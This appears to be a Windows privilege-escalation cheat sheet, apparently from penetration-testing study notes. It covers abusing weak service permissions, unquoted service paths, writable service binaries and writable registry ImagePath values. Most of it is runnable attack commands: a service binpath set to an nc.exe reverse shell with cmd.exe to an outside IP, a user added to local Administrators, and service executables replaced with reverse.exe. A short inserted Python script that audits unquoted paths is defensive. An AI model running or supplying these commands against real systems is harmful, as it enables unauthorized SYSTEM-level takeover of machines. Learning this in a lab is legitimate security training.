Each service has an ACL which defines certain service-specific permissions. Some permissions are innocuous (e.g. SERVICE_QUERY_CONFIG, SERVICE_QUERY_STATUS). Some may be useful (e.g. SERVICE_STOP, SERVICE_START). Some are dangerous (e.g. SERVICE_CHANGE_CONFIG, SERVICE_ALL_ACCESS).
If our user has permission to change the configuration of a service which runs with SYSTEM privileges, we can change the executable the service uses to one of our own. Potential Rabbit Hole: If you can change a service configuration but cannot stop/start the service, you may not be able to escalate privileges!
# Check the permissions on any service given to BOB
accesschk.exe /accepteula -uwcqv yourusername servicename
accesschk.exe /accepteula -uwcqv IWAM_BOB *
# -u: Suppress errors
# -w: Show only objects that have write access
# -c: Name is a Windows Service, e.g. ssdpsrv. Specify "*" as the name to show all services and "scmanager" to check the security of the Service Control Manager.
# -q: Omit banner
# -v: Verbose (includes Windows Vista Integrity Level)

# Check service configuration
sc qc SSDPSRV
# Check service status
sc query SSDPSRV
# Example
# Check the permissions given to a particular service
accesschk.exe -ucqv /accepteula SSDPSRV
# If you see R+W permission for the user, change the bin path and restart the service
# (note: sc config requires a space after each "=")
sc config SSDPSRV binpath= "C:\Inetpub\wwwroot\nc.exe -nv 192.168.119.128 1235 -e cmd.exe"
sc stop SSDPSRV
sc start SSDPSRV
# If you see an error when restarting the service, run the following:
sc config SSDPSRV obj= ".\LocalSystem" password= ""
sc config SSDPSRV start= "demand"
# Check the SSDPSRV service configuration
sc qc SSDPSRV
# Add the IWAM_BOB account to the local Administrators group to see the Administrator's directory and files
net localgroup Administrators IWAM_BOB /add
# Restart the service (attack)
sc stop SSDPSRV
net start SSDPSRV
When a service has an unquoted path that also contains spaces, such as 'Common Files' in C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe, Windows resolves the path one space-delimited prefix at a time. Placing a Common.exe in C:\Program Files\Unquoted Path Service\ therefore makes the service effectively run C:\Program Files\Unquoted Path Service\Common.exe instead of the intended binary.
# Enumeration
.\winPEASany.exe quiet servicesinfo
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

# Check the permissions for a particular user on each directory in the path
.\accesschk.exe /accepteula -uwdq C:\
.\accesschk.exe /accepteula -uwdq "C:\Program Files\"
.\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
# Copy the executable into the directory
copy reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
# Restart the service (attack)
sc stop SSDPSRV
net start SSDPSRV
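As an added audit example (not part of the original notes), the script below reproduces the path-resolution logic behind the unquoted path weakness so a defender can flag exposed services from a service inventory before anyone plants a binary: it takes ImagePath values (the PathName column of the wmic command above), lists the prefixes Windows would try first, and reports the parent directories whose write ACLs then need checking with accesschk -uwdq. The service names unquotedsvc and wuauserv and all path values are constructed sample data.

```python
import re
from typing import Dict, List

# Constructed sample of ImagePath values (the PathName column printed by
# `wmic service get name,pathname`); the unquotedsvc and wuauserv entries are
# invented for this example, not taken from a real host.
SAMPLE_SERVICES: Dict[str, str] = {
    "unquotedsvc": r"C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe",
    "filepermsvc": r'"C:\Program Files\File Permissions Service\filepermservice.exe"',
    "wuauserv": r"C:\Windows\system32\svchost.exe -k netsvcs -p",
}


def unquoted_path_candidates(image_path: str) -> List[str]:
    """Executables Windows would try before the intended binary.

    CreateProcess splits an unquoted command line on spaces and tries each
    prefix with .exe appended until one exists, so a planted file at any
    earlier prefix runs instead. Assumes the service binary is named *.exe.
    """
    path = image_path.strip()
    if not path or path.startswith('"'):
        return []  # a quoted path is resolved exactly as written
    m = re.match(r"(.*?\.exe)(\s|$)", path, re.IGNORECASE)
    if not m:
        return []
    tokens = m.group(1).split(" ")
    return [" ".join(tokens[:i]) + ".exe" for i in range(1, len(tokens))]


def audit_services(services: Dict[str, str]) -> Dict[str, List[str]]:
    """Exposed services -> hijack candidates, skipping binaries under
    C:\\Windows like the findstr /v "C:\\Windows\\" filter in the wmic line."""
    findings: Dict[str, List[str]] = {}
    for name, image_path in services.items():
        if image_path.strip('"').lower().startswith("c:\\windows\\"):
            continue
        cands = unquoted_path_candidates(image_path)
        if cands:
            findings[name] = cands
    return findings


def directories_to_check(candidates: List[str]) -> List[str]:
    """Parent directories whose write ACLs decide whether a candidate could be
    planted: these are the directories to feed to `accesschk -uwdq`."""
    dirs: List[str] = []
    for cand in candidates:
        parent = cand.rsplit("\\", 1)[0] + "\\"
        if parent not in dirs:
            dirs.append(parent)
    return dirs
```

Running audit_services(SAMPLE_SERVICES) flags only unquotedsvc, with C:\, C:\Program Files\ and C:\Program Files\Unquoted Path Service\ as the directories to check, matching the three accesschk calls above.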
If the original service executable is modifiable by our user, we can simply replace it with our reverse shell executable.
# Enumeration
.\winPEASany.exe quiet servicesinfo
# Check permissions given to the service executable
.\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
# Check permissions given to the service
.\accesschk.exe /accepteula -uvqc filepermsvc
# Back up the original executable, then replace it
copy "C:\Program Files\File Permissions Service\filepermservice.exe" "C:\temp\"
copy "C:\PrivEsc\reverse.exe" "C:\Program Files\File Permissions Service\filepermservice.exe"
# Restart the service (attack)
sc stop filepermsvc
net start filepermsvc
# Enumeration
.\winPEASany.exe quiet servicesinfo
# Check permissions given to the registry entry. Look for a user with full control
powershell
PS> Get-Acl HKLM:\System\CurrentControlSet\Services\regsvc | Format-List
.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
# Check the ImagePath
reg query HKLM\System\CurrentControlSet\Services\regsvc
# Check the permissions for the user (privilege to start and stop the service)
.\accesschk.exe /accepteula -ucqv yourusername regsvc
# Update the registry
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
# Restart the service (attack)
sc stop regsvc
net start regsvc